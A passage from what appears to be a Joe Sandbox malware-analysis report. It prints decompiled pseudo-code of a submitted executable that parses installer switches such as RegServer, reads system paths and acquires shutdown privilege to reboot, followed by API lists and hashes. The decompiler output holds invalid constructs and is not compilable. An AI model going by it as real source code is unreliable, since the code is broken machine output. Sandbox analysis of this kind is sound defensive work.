                                                                                                                                                                                                                                              												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              													L106:
                                                                                                                                                                                                                                              													_t63 = 0;
                                                                                                                                                                                                                                              													L125:
                                                                                                                                                                                                                                              													_pop(_t210);
                                                                                                                                                                                                                                              													_pop(_t212);
                                                                                                                                                                                                                                              													_pop(_t162);
                                                                                                                                                                                                                                              													return E00A86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                              													_t177 = _t177 + 1;
                                                                                                                                                                                                                                              													_t202 = _t202 + 1;
                                                                                                                                                                                                                                              													_t157 = 2;
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												if(_t213 != 0) {
                                                                                                                                                                                                                                              													_t163 = 1;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t213 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L131;
                                                                                                                                                                                                                                              								L30:
                                                                                                                                                                                                                                              								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                              								_t69 = _v272;
                                                                                                                                                                                                                                              							} while ( *_t69 != 0);
                                                                                                                                                                                                                                              							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                              								E00A86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                              								asm("int3");
                                                                                                                                                                                                                                              								_push(_t221);
                                                                                                                                                                                                                                              								_t222 = _t223;
                                                                                                                                                                                                                                              								_t71 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                              									0x4f0 = 2;
                                                                                                                                                                                                                                              									_t75 = E00A8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00A844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                              									 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              									_t75 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								return E00A86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                              								if(_t213 == 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										goto L34;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L40;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										_t79 = _v268;
                                                                                                                                                                                                                                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                              											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                              											if(_t83 == 0) {
                                                                                                                                                                                                                                              												_t202 = 0x521;
                                                                                                                                                                                                                                              												E00A844B9(0, 0x521, 0xa81140, 0, 0x40, 0);
                                                                                                                                                                                                                                              												_t85 =  *0xa88588; // 0x0
                                                                                                                                                                                                                                              												if(_t85 != 0) {
                                                                                                                                                                                                                                              													CloseHandle(_t85);
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												ExitProcess(0);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											_t87 = _t83 - 4;
                                                                                                                                                                                                                                              											if(_t87 == 0) {
                                                                                                                                                                                                                                              												if(_v266 != 0) {
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                              														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t50;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t88 =  *_t183;
                                                                                                                                                                                                                                              															_t183 = _t183 + 1;
                                                                                                                                                                                                                                              														} while (_t88 != 0);
                                                                                                                                                                                                                                              														if(_t183 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t205 = 0x5b;
                                                                                                                                                                                                                                              															if(E00A8667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                              																L115:
                                                                                                                                                                                                                                              																_t206 = 0x5d;
                                                                                                                                                                                                                                              																if(E00A8667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                              																	L117:
                                                                                                                                                                                                                                              																	_t202 =  &_v276;
                                                                                                                                                                                                                                              																	_v276 = _t167;
                                                                                                                                                                                                                                              																	if(E00A85C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t202 = 0x104;
                                                                                                                                                                                                                                              																		E00A81680(0xa88c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t202 = 0x5b;
                                                                                                                                                                                                                                              																	if(E00A8667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																		goto L49;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		goto L117;
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t202 = 0x5d;
                                                                                                                                                                                                                                              																if(E00A8667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L115;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													 *0xa88a24 = 1;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L50;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t100 = _t87 - 1;
                                                                                                                                                                                                                                              												if(_t100 == 0) {
                                                                                                                                                                                                                                              													L98:
                                                                                                                                                                                                                                              													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              														goto L49;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                              														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                              														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                              														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                              														_t202 = _t38;
                                                                                                                                                                                                                                              														do {
                                                                                                                                                                                                                                              															_t101 =  *_t192;
                                                                                                                                                                                                                                              															_t192 = _t192 + 1;
                                                                                                                                                                                                                                              														} while (_t101 != 0);
                                                                                                                                                                                                                                              														if(_t192 == _t202) {
                                                                                                                                                                                                                                              															goto L49;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t202 =  &_v276;
                                                                                                                                                                                                                                              															_v276 = _t170;
                                                                                                                                                                                                                                              															if(E00A85C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                              																goto L49;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                              																_t218 = 0xa88b3e;
                                                                                                                                                                                                                                              																_t105 = _v276;
                                                                                                                                                                                                                                              																if(_t104 != 0x54) {
                                                                                                                                                                                                                                              																	_t218 = 0xa88a3a;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              																E00A81680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                              																_t202 = 0x104;
                                                                                                                                                                                                                                              																E00A8658A(_t218, 0x104, 0xa81140);
                                                                                                                                                                                                                                              																if(E00A831E0(_t218) != 0) {
                                                                                                                                                                                                                                              																	goto L50;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	goto L106;
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                              													if(_t111 == 0) {
                                                                                                                                                                                                                                              														if(_v266 != 0) {
                                                                                                                                                                                                                                              															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																goto L49;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																_t199 = _v265;
                                                                                                                                                                                                                                              																if(_t199 != 0) {
                                                                                                                                                                                                                                              																	_t219 =  &_v265;
                                                                                                                                                                                                                                              																	do {
                                                                                                                                                                                                                                              																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                              																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                              																		if(_t115 == 0) {
                                                                                                                                                                                                                                              																			 *0xa88a2c = 1;
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			_t200 = 2;
                                                                                                                                                                                                                                              																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                              																			if(_t119 == 0) {
                                                                                                                                                                                                                                              																				 *0xa88a30 = 1;
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                              																					 *0xa88a34 = 1;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t209 = 0;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																		_t118 =  *_t219;
                                                                                                                                                                                                                                              																		_t199 = _t118;
                                                                                                                                                                                                                                              																	} while (_t118 != 0);
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															 *0xa88a2c = 1;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														goto L50;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														_t127 = _t111 - 3;
                                                                                                                                                                                                                                              														if(_t127 == 0) {
                                                                                                                                                                                                                                              															if(_v266 != 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																	goto L49;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                              																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                              																		goto L76;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                              																			goto L83;
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                              																				goto L76;
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				goto L49;
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																L76:
                                                                                                                                                                                                                                              																_push(2);
                                                                                                                                                                                                                                              																_pop(1);
                                                                                                                                                                                                                                              																L83:
                                                                                                                                                                                                                                              																 *0xa88a38 = 1;
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              															goto L50;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t132 = _t127 - 1;
                                                                                                                                                                                                                                              															if(_t132 == 0) {
                                                                                                                                                                                                                                              																if(_v266 != 0) {
                                                                                                                                                                                                                                              																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                              																			goto L49;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		_t201 = _v265;
                                                                                                                                                                                                                                              																		 *0xa89a2c = 1;
                                                                                                                                                                                                                                              																		if(_t201 != 0) {
                                                                                                                                                                                                                                              																			_t220 =  &_v265;
                                                                                                                                                                                                                                              																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0xa89a2c =  *0xa89a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0xa88d48 =  *0xa88d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0xa89a2c =  *0xa89a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0xa89a2c =  *0xa89a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0xa88d48 =  *0xa88d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0xa89a2c =  *0xa89a2c | 0x00000004;
																										L70:
																										 *0xa88a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0xa89a2c = 3;
																	 *0xa88a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0xa88a2c != 0 &&  *0xa88b3e == 0) {
						if(GetModuleFileNameA( *0xa89a3c, 0xa88b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E00A866C8(0xa88b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d9e
                                                                                                                                                                                                                                              0x00a85d51
                                                                                                                                                                                                                                              0x00a85d5b
                                                                                                                                                                                                                                              0x00a85d72
                                                                                                                                                                                                                                              0x00a860fb
                                                                                                                                                                                                                                              0x00a860fb
                                                                                                                                                                                                                                              0x00a86207
                                                                                                                                                                                                                                              0x00a8620a
                                                                                                                                                                                                                                              0x00a8620b
                                                                                                                                                                                                                                              0x00a8620e
                                                                                                                                                                                                                                              0x00a86217
                                                                                                                                                                                                                                              0x00a85d78
                                                                                                                                                                                                                                              0x00a85d78
                                                                                                                                                                                                                                              0x00a85d80
                                                                                                                                                                                                                                              0x00a85d83
                                                                                                                                                                                                                                              0x00a85d84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d84
                                                                                                                                                                                                                                              0x00a85d5d
                                                                                                                                                                                                                                              0x00a85d5f
                                                                                                                                                                                                                                              0x00a85d62
                                                                                                                                                                                                                                              0x00a85d68
                                                                                                                                                                                                                                              0x00a85d64
                                                                                                                                                                                                                                              0x00a85d64
                                                                                                                                                                                                                                              0x00a85d64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d62
                                                                                                                                                                                                                                              0x00a85d5b
                                                                                                                                                                                                                                              0x00a85d4f
                                                                                                                                                                                                                                              0x00a85d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d9f
                                                                                                                                                                                                                                              0x00a85d9f
                                                                                                                                                                                                                                              0x00a85da5
                                                                                                                                                                                                                                              0x00a85dab
                                                                                                                                                                                                                                              0x00a85dba
                                                                                                                                                                                                                                              0x00a86218
                                                                                                                                                                                                                                              0x00a8621d
                                                                                                                                                                                                                                              0x00a86220
                                                                                                                                                                                                                                              0x00a86221
                                                                                                                                                                                                                                              0x00a86229
                                                                                                                                                                                                                                              0x00a86230
                                                                                                                                                                                                                                              0x00a86247
                                                                                                                                                                                                                                              0x00a8626a
                                                                                                                                                                                                                                              0x00a86272
                                                                                                                                                                                                                                              0x00a86249
                                                                                                                                                                                                                                              0x00a86255
                                                                                                                                                                                                                                              0x00a8625f
                                                                                                                                                                                                                                              0x00a86264
                                                                                                                                                                                                                                              0x00a86264
                                                                                                                                                                                                                                              0x00a86284
                                                                                                                                                                                                                                              0x00a85dc0
                                                                                                                                                                                                                                              0x00a85dc0
                                                                                                                                                                                                                                              0x00a85dca
                                                                                                                                                                                                                                              0x00a85e22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85dcc
                                                                                                                                                                                                                                              0x00a85dce
                                                                                                                                                                                                                                              0x00a85e24
                                                                                                                                                                                                                                              0x00a85e24
                                                                                                                                                                                                                                              0x00a85e2c
                                                                                                                                                                                                                                              0x00a85e47
                                                                                                                                                                                                                                              0x00a85e4a
                                                                                                                                                                                                                                              0x00a861d2
                                                                                                                                                                                                                                              0x00a861e2
                                                                                                                                                                                                                                              0x00a861e7
                                                                                                                                                                                                                                              0x00a861ee
                                                                                                                                                                                                                                              0x00a861f1
                                                                                                                                                                                                                                              0x00a861f1
                                                                                                                                                                                                                                              0x00a861f8
                                                                                                                                                                                                                                              0x00a861f8
                                                                                                                                                                                                                                              0x00a85e50
                                                                                                                                                                                                                                              0x00a85e53
                                                                                                                                                                                                                                              0x00a86109
                                                                                                                                                                                                                                              0x00a8611f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86125
                                                                                                                                                                                                                                              0x00a86137
                                                                                                                                                                                                                                              0x00a8613a
                                                                                                                                                                                                                                              0x00a8613c
                                                                                                                                                                                                                                              0x00a8613e
                                                                                                                                                                                                                                              0x00a8613e
                                                                                                                                                                                                                                              0x00a86141
                                                                                                                                                                                                                                              0x00a86141
                                                                                                                                                                                                                                              0x00a86143
                                                                                                                                                                                                                                              0x00a86144
                                                                                                                                                                                                                                              0x00a8614a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86150
                                                                                                                                                                                                                                              0x00a86152
                                                                                                                                                                                                                                              0x00a8615c
                                                                                                                                                                                                                                              0x00a86170
                                                                                                                                                                                                                                              0x00a86172
                                                                                                                                                                                                                                              0x00a8617c
                                                                                                                                                                                                                                              0x00a86190
                                                                                                                                                                                                                                              0x00a86190
                                                                                                                                                                                                                                              0x00a86196
                                                                                                                                                                                                                                              0x00a861a5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a861ab
                                                                                                                                                                                                                                              0x00a861b9
                                                                                                                                                                                                                                              0x00a861c6
                                                                                                                                                                                                                                              0x00a861c6
                                                                                                                                                                                                                                              0x00a8617e
                                                                                                                                                                                                                                              0x00a86180
                                                                                                                                                                                                                                              0x00a8618a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85eef
                                                                                                                                                                                                                                              0x00a85ef2
                                                                                                                                                                                                                                              0x00a85f34
                                                                                                                                                                                                                                              0x00a85ef4
                                                                                                                                                                                                                                              0x00a85ef4
                                                                                                                                                                                                                                              0x00a85ef7
                                                                                                                                                                                                                                              0x00a85f2b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85ef9
                                                                                                                                                                                                                                              0x00a85ef9
                                                                                                                                                                                                                                              0x00a85efc
                                                                                                                                                                                                                                              0x00a85f22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85efe
                                                                                                                                                                                                                                              0x00a85eff
                                                                                                                                                                                                                                              0x00a85f02
                                                                                                                                                                                                                                              0x00a85f16
                                                                                                                                                                                                                                              0x00a85f04
                                                                                                                                                                                                                                              0x00a85f07
                                                                                                                                                                                                                                              0x00a85f0d
                                                                                                                                                                                                                                              0x00a85f46
                                                                                                                                                                                                                                              0x00a85f46
                                                                                                                                                                                                                                              0x00a85f09
                                                                                                                                                                                                                                              0x00a85f09
                                                                                                                                                                                                                                              0x00a85f09
                                                                                                                                                                                                                                              0x00a85f07
                                                                                                                                                                                                                                              0x00a85f02
                                                                                                                                                                                                                                              0x00a85efc
                                                                                                                                                                                                                                              0x00a85ef7
                                                                                                                                                                                                                                              0x00a85ef2
                                                                                                                                                                                                                                              0x00a85f4c
                                                                                                                                                                                                                                              0x00a85f4e
                                                                                                                                                                                                                                              0x00a85f50
                                                                                                                                                                                                                                              0x00a85f54
                                                                                                                                                                                                                                              0x00a85ed4
                                                                                                                                                                                                                                              0x00a85ea2
                                                                                                                                                                                                                                              0x00a85ea4
                                                                                                                                                                                                                                              0x00a85eaf
                                                                                                                                                                                                                                              0x00a85eaf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e79
                                                                                                                                                                                                                                              0x00a85e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e83
                                                                                                                                                                                                                                              0x00a85e83
                                                                                                                                                                                                                                              0x00a85e83
                                                                                                                                                                                                                                              0x00a85e85
                                                                                                                                                                                                                                              0x00a85e85
                                                                                                                                                                                                                                              0x00a85e8e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85e94
                                                                                                                                                                                                                                              0x00a85e8e
                                                                                                                                                                                                                                              0x00a85e7d
                                                                                                                                                                                                                                              0x00a85e77
                                                                                                                                                                                                                                              0x00a85e6e
                                                                                                                                                                                                                                              0x00a85e65
                                                                                                                                                                                                                                              0x00a85e5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85dd0
                                                                                                                                                                                                                                              0x00a85dd0
                                                                                                                                                                                                                                              0x00a85dd0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85dd0
                                                                                                                                                                                                                                              0x00a85dce
                                                                                                                                                                                                                                              0x00a85dca
                                                                                                                                                                                                                                              0x00a85dba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85d00
                                                                                                                                                                                                                                              0x00a85dd9
                                                                                                                                                                                                                                              0x00a85e04
                                                                                                                                                                                                                                              0x00a861fe
                                                                                                                                                                                                                                              0x00a85e0a
                                                                                                                                                                                                                                              0x00a85e0c
                                                                                                                                                                                                                                              0x00a85e17
                                                                                                                                                                                                                                              0x00a85e17
                                                                                                                                                                                                                                              0x00a85e04
                                                                                                                                                                                                                                              0x00a86200
                                                                                                                                                                                                                                              0x00a86200
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharNextA.USER32(?,00000000,?,?), ref: 00A85CEE
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00A88B3E,00000104,00000000,?,?), ref: 00A85DFC
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00A85E3E
                                                                                                                                                                                                                                              • CharUpperA.USER32(-00000052), ref: 00A85EE1
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A85F6F
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00A85FA7
                                                                                                                                                                                                                                              • CharUpperA.USER32(-0000004E), ref: 00A86008
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00A860AA
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00A81140,00000000,00000040,00000000), ref: 00A861F1
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00A861F8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                              • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                              • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                              • Opcode ID: 6030109e53eb9946d8c79a6ccae10c28b520cfdba72e22bb01766027a7f823fd
                                                                                                                                                                                                                                              • Instruction ID: e7cac3e123b89215b0b0ef969c18122d274cec573b78b7297b8d6be9f026cd7a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6030109e53eb9946d8c79a6ccae10c28b520cfdba72e22bb01766027a7f823fd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D14871E04A445FEF39FB788C487FA7BB1AB16344F5441AACD86C6191EA748E878F01
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                                              			E00A81F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				int _t28;
                                                                                                                                                                                                                                              				signed char _t30;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t41 = __esi;
                                                                                                                                                                                                                                              				_t38 = __edi;
                                                                                                                                                                                                                                              				_t30 = __ecx;
                                                                                                                                                                                                                                              				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						if( *0xa89a40 != 0) {
                                                                                                                                                                                                                                              							_pop(_t30);
                                                                                                                                                                                                                                              							_t44 = _t46;
                                                                                                                                                                                                                                              							_t13 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                              							_push(_t38);
                                                                                                                                                                                                                                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                              								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                              								_v12 = 2;
                                                                                                                                                                                                                                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                              								CloseHandle(_v28);
                                                                                                                                                                                                                                              								_t41 = _t41;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                              										_t25 = 1;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t37 = 0x4f7;
                                                                                                                                                                                                                                              										goto L3;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t37 = 0x4f6;
                                                                                                                                                                                                                                              									goto L4;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t37 = 0x4f5;
                                                                                                                                                                                                                                              								L3:
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								L4:
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								E00A844B9(0, _t37);
                                                                                                                                                                                                                                              								_t25 = 0;
